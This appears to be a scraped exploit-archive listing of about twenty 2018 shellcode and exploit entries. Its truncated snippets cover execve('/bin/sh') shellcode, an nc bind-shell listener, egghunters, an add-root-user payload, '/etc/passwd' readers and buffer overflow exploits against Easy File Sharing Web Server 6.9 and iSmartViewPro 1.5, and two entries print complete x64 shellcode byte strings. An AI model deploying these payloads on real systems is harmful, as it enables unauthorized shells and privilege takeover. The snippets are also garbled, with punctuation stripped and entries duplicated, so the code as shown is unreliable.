Linux/x64 - Execute /bin/nc -lvp 9090 Shellcode (60 bytes)

Linux/x64 - Execute /bin/nc -lvp 9090 Shellcode 60 bytes Usage: gcc sc.c -o sc -z execstack include include int mainvoid char sc =...

Linux/x64 - execve ("/bin/sh") Shellcode (24 bytes)

Linux/x64 - Execve //bin/sh Shellcode 24 bytes Usage: gcc sc.c -o sc -z execstack include include int mainvoid char shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...

Linux/x64 - execve ("/bin/bash") Shellcode (27 bytes)

Author: Artr0n Linux/x64 - Execve/bin/bash Shellcode Shellcode Lenght: 27 include include int mainvoid char shellcode = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...

Linux/ARM - sigaction() Based Egghunter (PWN!) + execve Shellcode (52 Bytes)

/ Title: Linux/ARM - sigaction Based Egghunter PWN! + execve"/bin/sh", NULL, NULL Shellcode 52 Bytes Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara System Information pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux...

Linux/ARM - Egghunter (PWN!) + execve("/bin/sh", NULL, NULL) Shellcode (28 Bytes)

Linux/ARM - Egghunter PWN! + execve"/bin/sh", NULL, NULL Shellcode 28 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Egghunter PWN! + execve"/bin/sh", NULL, NULL Shellcode 28 Bytes Date: 2018-09-24 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara System Information...

Linux/ARM - Egghunter (PWN!) + execve("/bin/sh", NULL, NULL) + sigaction() Shellcode (52 Bytes)

Linux/ARM - Egghunter PWN! + execve"/bin/sh", NULL, NULL + sigaction Shellcode 52 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - sigaction Based Egghunter PWN! + execve"/bin/sh", NULL, NULL Shellcode 52 Bytes Date: 2018-09-24 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken...

Linux/x86 - Egghunter + sigaction-based Shellcode (27 bytes)

/ Title: Linux/x86 - Egghunter + sigaction-based Shellcode 27 bytes Author:Valbrux This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode global start section .text ;zeroing ecx xor ecx,ecx start: ;increment inc ecx ;sigaction syscall number push byte 67 pop ea...

Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)

Linux/x86 - Egghunter 0x50905090 + sigaction Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - Egghunter + sigaction-based Shellcode 27 bytes Author:Valbrux Date: 2018-09-19 This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode...

Linux/ARM - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (4 Bytes)

Linux/ARM - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 4 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 4 Bytes Date: 2018-09-18 Author: Ken Kitahara Tested: armv7l Raspberry Pi 3 Model B+ System...

Linux/ARM - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (4 Bytes)

/ Title: Linux/ARM - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 4 Bytes Author: Ken Kitahara Tested: armv7l Raspberry Pi 3 Model B+ System Information pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux pi@raspberrypi: $...

Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)

/ Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode 54 bytes Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc -o xorencodedshellcode -z execstack -fno-stack-protector xorencodedshellcode.c / / Disassembly of section .text: 08048060 : 804806...

Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)

/ Shellcode Title: Linux/x86 - Read File /etc/passwd MSF Optimized Shellcode 61 bytes Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc -o readfileshellcode -z execstack -fno-stack-protector readfileshellcode.c / / Disassembly of section .text: 08048060 :...

Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)

Linux/x86 - Add Root User r00t/blank + Polymorphic Shellcode 103 bytes. Shellcode exploit for Linuxx86 platform / Shellcode Title: Linux/x86 - Add Userr00t/blank Polymorphic Shellcode 103 bytes Date: 2018-09-13 Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 gcc...

Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)

Linux/x86 - Read File /etc/passwd + MSF Optimized Shellcode 61 bytes. Shellcode exploit for Linuxx86 platform / Shellcode Title: Linux/x86 - Read File /etc/passwd MSF Optimized Shellcode 61 bytes Date: 2018-09-13 Author: Ray Doyle @doylersec Homepage: https://www.doyler.net Tested on: Linux/x86 g...

Easy File Sharing Web Server 6.9 Buffer Overflow Exploit

Easy File Sharing Web Server version 6.9 POST msg.ghp UserID remote buffer overflow SEH exploit with DEP bypass and ROP. !/usr/bin/python Exploit Title: Easy File Sharing Web Server 6.9 - 'POST' msg.ghp 'UserID' Remote Buffer Overflow SEHDEP Bypass + ROP Google Dork: intitle:"Login - powered by...

Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode 20 Bytes

/ Title: Linux/ARM - read0, buf, 0xff stager + execve"/bin/sh", NULL, NULL Shellcode 20 Bytes Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara System Information pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux...

iSmartViewPro 1.5 - DDNS Buffer Overflow Exploit

Exploit for windows platform in category local exploits Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow Discovery by: Luis Martinez Vendor Homepage: https://securimport.com/ Software Link:...

iSmartViewPro 1.5 DDNS Buffer Overflow

Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow Discovery by: Luis Martinez Discovery Date: 2018-09-03 Vendor Homepage: https://securimport.com/ Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 Tested Version: 1.5...

Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (20 Bytes)

Linux/ARM - read0, buf, 0xff stager + execve"/bin/sh", NULL, NULL Shellcode 20 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - read0, buf, 0xff stager + execve"/bin/sh", NULL, NULL Shellcode 20 Bytes Date: 2018-08-31 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara Syste...

Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode 28 Bytes

/ Title: Linux/ARM - read0, buf, 0xff stager + execve"/bin/sh", NULL, NULL Shellcode 28 Bytes Date: 2018-08-30 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux pi@raspberrypi...